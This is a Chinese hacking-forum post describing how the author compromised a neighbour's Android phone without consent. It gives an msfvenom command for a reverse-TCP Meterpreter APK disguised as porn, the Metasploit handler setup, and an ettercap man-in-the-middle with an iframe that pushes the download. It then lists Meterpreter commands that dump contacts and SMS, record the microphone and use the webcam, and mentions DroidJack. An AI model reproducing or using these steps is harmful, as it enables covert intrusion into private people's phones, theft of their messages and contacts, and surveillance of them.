找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1809|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

# l8 r1 W* I; V 五、msf+ettercap入侵邻居安卓手机 / Q6 I E0 ~2 [! f4 j

+ T. n) f& q' x, }

( M" o7 X1 T7 \: g" d 首先启动msf . n' z9 F2 ]1 k% p

/ N1 t' k) v0 P5 t' v9 v

7 `& {" x; Z) F+ Y8 F _ 先用kali生成一个安卓木马,如下命令: 8 j1 p5 L& `7 S, [# B8 _9 a, U' F

5 ^- ~; s6 R! j% P( `

2 T) X2 T1 M) o, n0 q Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk * V( p2 q3 e; q! N

- Y4 Z0 V1 l1 j o1 p: a# k

( }- ^1 G- h- q8 h2 i2 s 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 9 t% a. n# M1 x& X' c5 ?

( N$ O4 p. h! B/ K

: h+ l+ Y M$ C 然后进入msf 7 n: q! J7 {2 g1 E9 J

* x+ b7 e1 g( U5 m. j6 I4 Q b6 b

" d' o$ {$ ?* s z4 l$ g' m& [+ B1 c use exploit/multi/handler & P0 b# K& e2 h+ M% r: h

' s; \% i+ _5 @5 m" o. }( n; }

2 s0 S2 f7 a j. } J2 b set payload android/meterpreter/reverse_tcp 9 k8 o: d2 p3 Z }2 n) ?

, ?7 |. r0 _2 K) @) c& A) J: T

$ e$ F4 K/ K2 W6 F X0 L set LHOST 192.168.0.109 //ipkailiip ; [/ s# O" E! C3 [; M7 }

7 L- [3 e' o3 u8 U

2 D! G" _4 o4 G, g4 B4 {/ Y set LPORT 44444 //端口一定要与前面生成的木马的端口一致 ; y- }- Z1 U% A& F+ z- C& d

% U, Z8 u( p0 R2 I8 O

& G. U* _3 {7 X* J0 e0 r# \9 a Exploit " Z. {) v5 b& B2 L* v4 B

1 |0 k# o+ z6 [, e. V9 s

5 ]! `/ B9 C) E% o1 Z   - B$ o6 [+ e. I

* [, r+ X, V. h6 P2 [

. l4 R. ^2 n$ |& E! R: ? 下面我们开启ettercap -G 6 N, V( j3 Q3 E7 N) ?& L% g

, H' a% z# a) w$ W

$ v' {% u z, ]; Y4 @1 Q6 v! r 我物理IP 5 P+ b5 K- }9 D$ ?7 J o% c

' I: W3 m4 H+ _

" x8 x8 ~3 P# ?) g/ J5 R   A4 o- U* B' r1 V3 h) d/ P

; j1 \& u3 V1 C# X3 `$ Y% l

5 g- a" B) W3 t) t 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, 6 A9 [$ g% e. i9 Z n3 o, {$ `

6 I V; q% e( O. J p( I7 K

! j4 [ o: V( c( r 下面我们来设置一下 6 e: V' a$ _0 k4 X8 r+ a

$ r) q: A1 p& m5 Q

" } N, N% W: \: d6 ]   : [& m6 O! v2 _/ g8 a! V

2 _9 Y- f! F% {, Q

, H2 z9 [9 ?1 w8 ~* U. a: Q/ r 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, 5 |( H" i T9 q

5 Z" T" _: I$ }7 J3 w5 b0 I

0 r/ F4 D' _+ \9 E( z3 i6 C   3 N( D" s2 m& e2 B5 j

. M" p# u o. L( k, h

, J1 G5 h. c" z. E   % [/ L( y2 s; m9 h u! l

2 D( v( {( \+ O* |; m5 I

2 q v# p( F7 }   1 n# P& |! \; O" p1 l

7 j. } A; r' i0 P6 l

+ C3 y; r; [) Z: u   # r0 v) z4 @4 @: Z! @& w

3 G1 b. u. u4 ^- l+ \$ W6 Z

3 D+ |4 t, q& o4 D* ]( f- }   . _" K W4 a) W$ f1 N) }+ ]

! V/ [: U* ]. v5 L) u

! S+ H& k3 i' b' a# b$ o1 ?; h   4 ?) }9 |1 E; Z+ T

4 y' J" S- m. F" H( ] D

% Y, G% l) {% ?* j% T! m% @   9 n- E: F( r3 v; h

3 o; O0 L) g" U+ Y

+ Y P9 N o4 O5 r   9 c9 l+ e, K; D8 C' g$ S

/ n a- y8 T2 d' P/ {

% c* \- a( M% x   1 f' F: M" }) M, ]. M# Z

/ q4 [3 R7 ?! w& q, m7 i5 c

6 |' J9 u: D1 E' D   2 u6 L# n: Q# ?4 B

& U' n3 Q. Y# H1 d: i& U

7 s. C) S& n: r7 ^. X K* O   1 p% B) `- h! b7 G3 d8 m l

/ W( M: U% _ u0 C# M8 J

8 _9 f) e, s6 [6 p4 c" ~   2 j- E4 C# g5 q" ]' b1 _4 z F' o

+ q" ]" a+ R( Q. n. M

6 Q3 Y6 C/ f& A9 x4 C0 w   0 R6 _( N4 ^, p2 T

+ _% e. }4 {6 T% h4 z

3 a, r2 m0 m% S& j% A& I' ]) R 下面我们开始攻击 3 ~, e% p5 z' b% k( x

8 W' P) c0 K( d9 D7 Z- ]5 N

6 f! G9 C7 Y2 V) p   ! Z) K. E# U) G& y$ Q8 x0 m

. N& I D& S) r8 o( \) f Y3 c

% M2 n* O# h- P) a+ l4 v   - H5 e4 c/ i1 u% ]( B

+ O) m4 E( j% E7 i, I

R* Q o1 q7 ^$ H& _1 h   : ?9 E5 R1 n' U/ [+ p

0 D: S% n9 n6 K: @, @

' t; r, O0 U% o   : I% y* p9 M( E% F+ T" F1 M

, x; b/ e! }$ e

" D% a/ H; K. g3 [6 E0 @   - W$ U N- Q+ ?8 z9 a9 N) j

# K# ?0 ?8 Z' d" _

: o, X" W& @' R 大概过了5分钟多,发现反弹成功了 * v, l0 e& g8 Z5 n+ v" V% ^

8 ~/ v, Q4 y& D/ V' x

' h; I# l# ^. z   / R; i; r( O+ n

9 d0 g# `9 h0 h# @

# V4 s5 Y2 T2 \   , [8 s2 B! w% W2 f; S

, ]1 s1 _- i. j/ `( b! X8 {8 F2 X

9 T7 H) f8 L1 ^   7 i) i E6 {$ V

" @. x; A% y& V2 m" i" @; v

: Z! I# ~$ d0 m0 H7 E   ' e. S5 r6 g% i

/ b8 i L6 X( ?

1 F. S9 F( M0 t3 [1 V' Y8 N   2 \; Z! Z# }5 c; ?

7 H* v$ Z$ {' `, Q( G

) |$ ?( Z, [3 [- q. S5 S a   ' m6 b; p" b& o D# L

( o& }, ~: ]/ h* x+ [

$ g8 `! \( g& a: _+ u* Q: `   4 C: ]. D, N# a/ V& s" ?

% x3 ^% f3 c u% J1 U

. }" s9 S0 x- `7 p 执行命令 ) e; {( D! v' M7 o5 Q0 g& ]

' G X! i# J4 a$ S# ~

+ C. e- n+ n' k: w   " V( n# ?1 I) R+ C, O; y

/ `8 R& Y. v2 E$ Y! x$ P# E

, S2 s5 g6 k" X8 e3 ]6 P% G% S dump_contacts    --》这个是导出电话 - C2 B# }. R, L6 y: ~6 a

. `) Z) I1 F1 W

5 e9 b8 b4 O* ]7 Q- j% ` dump_sms --》这个是导出信息 ( b1 Q' P3 [+ i2 t; z) G

+ q& w e4 d. |' M

: L# t2 o" e6 Y& u0 h T" e record_mic     Record audio from the default microphone for X seconds ( T3 k, R' G" t4 C% W+ P

" y1 b% }/ s' r& ]8 r. E5 K

+ m8 q8 m* V1 T# h5 W     webcam_chat    Start a video chat 3 z$ U/ h! k# H5 H

$ o: I, A9 p# i% m9 l

2 p" v7 Q3 @1 u. j     webcam_list    List webcams ) J4 Y, S$ U0 u6 R- Q* Q* y; p

7 H# w( K$ q# \9 ~$ x _6 Y

8 ^& k5 a B& W$ h. G6 G     webcam_snap    Take a snapshot from the specified webcam * ~/ f( ^; W3 \! D

$ ?) i1 @+ k- w1 ~0 @3 C" t

4 u6 w+ k1 q6 e7 q% u Z webcam_stream  lay a video stream from the specified webcam . d: w5 I" ]: t2 [( j2 ?

& |7 z2 W ?; f5 O& L

* Q5 @0 Y4 ^. d   % J5 e. s/ W% S) c# J2 ]

) X# h) }8 w( X5 |' n

) Z$ e+ h5 R& K E, k   . i& ^0 }" Q* v4 J0 D

$ D( N6 i4 B9 j2 S0 F3 Z) J

' t% E- T" Q2 o. Q& v. e8 c- o) n& p 我们打开看一下电话薄, 4 P) X2 L# b8 P; ~ m% {

; _! I; d' |5 `3 v: s# M

0 c- M8 @- f7 B; ]$ A! t   7 O# d$ {! G* Q

6 W" {1 F& A4 a9 |% _% F2 e$ v

: t& k! {0 s x   # O8 p6 t) Z# L! M* X% L i y

- ?, E K0 r& a6 d: D

. k* g/ ]) k/ S' u( K& ~   $ e" P9 u' V+ j y7 U

5 t% K$ A* J$ j2 ~4 C) O$ H

4 p4 ?+ g0 q4 v, ?. p7 C2 v   " v0 m t9 w7 G! _, J: j

/ s2 v+ c% g4 q: ^

! V) v( L. @$ @/ Q/ @9 f   7 X0 V; n) r/ _. {' M& I; H8 ?

2 g' H: p" Z$ N& W- c0 _

( I* [5 p' l9 n7 c: ]   0 U9 s9 b- a& J, b

% Z2 ~# Y$ t7 h0 W5 J$ J

/ M+ a; A U8 X5 A" k# {3 _ 我们同时欺骗成DroidJack木马,使用方法如图: ; x) r# }2 v, p8 g0 Q* x- C

) s# [# u. o: H$ O

( L% \$ U% ~! F/ n7 W; P   1 D7 K' w" w, S/ B( i

6 @& P [! f! j& z

4 U6 o. l& B3 c- ~6 u3 I! U+ o; u   + f+ p3 j8 Z) w+ t; E

! ]4 R% w0 }9 q- @1 i9 h

# n, L; g; ^5 s9 X+ @7 I   + A$ ]: h2 S- P! r g

, i# |5 d' q) c: ?: D

% @- v6 ]4 [) d: L 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 & W0 `4 u- A2 n/ X0 w; o4 w

( }1 ?( |: R* m

" g5 B+ a9 i( {9 ]6 X   , J8 t4 q9 A% o/ w

6 d5 S& o9 J. E

8 z. W% E+ x4 [( T/ C   3 o% _6 G# W; T0 A: x

4 Z6 K; \. O Q( C E2 T- i6 H

5 v5 X2 T7 W5 L3 r) @# J) F8 D' {   ( h% F2 f4 O+ ?7 X1 D1 v7 g: y

$ z/ f% D/ z2 b( T/ `7 A1 n4 ]

; `7 w! R6 H. \9 d7 r$ ] + O8 |# J3 {! |9 b5 f

: b2 l' P! G* |, f$ H

2 T- r7 o* y5 B3 `0 t) ]0 b
; g9 ]" c) n5 n1 {: M

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表